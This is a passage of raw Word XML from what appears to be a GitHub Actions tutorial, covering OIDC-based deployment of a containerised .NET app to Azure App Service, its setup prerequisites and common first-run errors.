                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (app-publish)</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Hands the build output off to the deploy job.</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Jobs run on different runners — artifacts are how they share files.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azure/login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (OIDC)</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Authenticates the runner to Azure with a short-lived token.</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No long-lived service principal credentials in GitHub.</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az acr login</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Authenticates Docker to ACR using the Azure session.</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So </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">docker push</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> works.</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docker build / push</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Builds the image and pushes both </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">:sha</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">:latest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags.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SHA tag for traceability, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">latest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> for convenience.</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azure/webapps-deploy</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Tells App Service to pull the new image.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The actual deployment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What you need to set up before this works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The workflow assumes the following exists. None of it lives in the repo — these are one-time platform prerequisites.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">An Azure subscription</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an Azure Container Registry (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">mycompanyregistry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">) and an App Service configured to run a Linux container.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">An Azure AD app registration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a "service principal") with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">acrPush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> role on the ACR.    - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Contributor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> role on the App Service resource group.    - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Federated credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> that trust GitHub Actions OIDC tokens for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">repo:owner/repo:ref:refs/heads/main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the repo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">AZURE_CLIENT_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the AD app's Application (client) ID.    - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">AZURE_TENANT_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — your tenant ID.    - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">AZURE_SUBSCRIPTION_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the subscription that holds the resources above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the repo root that builds your .NET app into a runnable container.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Settings → Environments → New) with required reviewers if you want a human approval before deploy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Running it for real (and what usually goes wrong the first time)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">You can't fully execute this from inside a doc — it needs your Azure subscription. But here's what the first end-to-end run normally looks like:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Push the workflow file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → CI runs, tests pass, build artifacts upload. ✅</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Merge to main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → deploy job kicks off. Runner spins up.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OIDC step fails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> with "AADSTS70021: No matching federated identity record found." 😬 Fix: in the Azure AD app, add a federated credential whose subject exactly matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">repo:&lt;owner&gt;/&lt;repo&gt;:ref:refs/heads/main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Re-run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → OIDC works, but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">az acr login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> fails with insufficient permissions. Fix: add the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">acrPush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> role on the ACR for the AD app.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Re-run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → image pushes, but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">webapps-deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> fails because the App Service is configured for code, not container. Fix: in the App Service, switch to Container deployment and set the registry URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Re-run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → deploys successfully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Each of these is a one-time setup error. After the first successful run, this workflow is boringly reliable. (The first run is always the hardest one — even for people who do this for a living.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mapping back to earlier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Concept used here</w:t>
            </w:r>
          </w:p>
        </w:tc>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Covered in</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Two-job pipeline (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">build-and-test</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">deploy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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Scenario 2</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Job-level </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">if:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to deploy only on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">main</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> push</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Section 10.2</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Dependency caching (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">actions/cache</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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Recipe 7</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Artifacts to share files between jobs</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Section 7</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OIDC to Azure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Section 9 (Key Vault subsection) and Section 10.1</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permissions: id-token: write</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> for OIDC</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Section 10.1</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Environment with required reviewers</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Scenario 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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12. Real-world pipeline patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Recipes are copy-paste. Patterns are how you </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">think</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
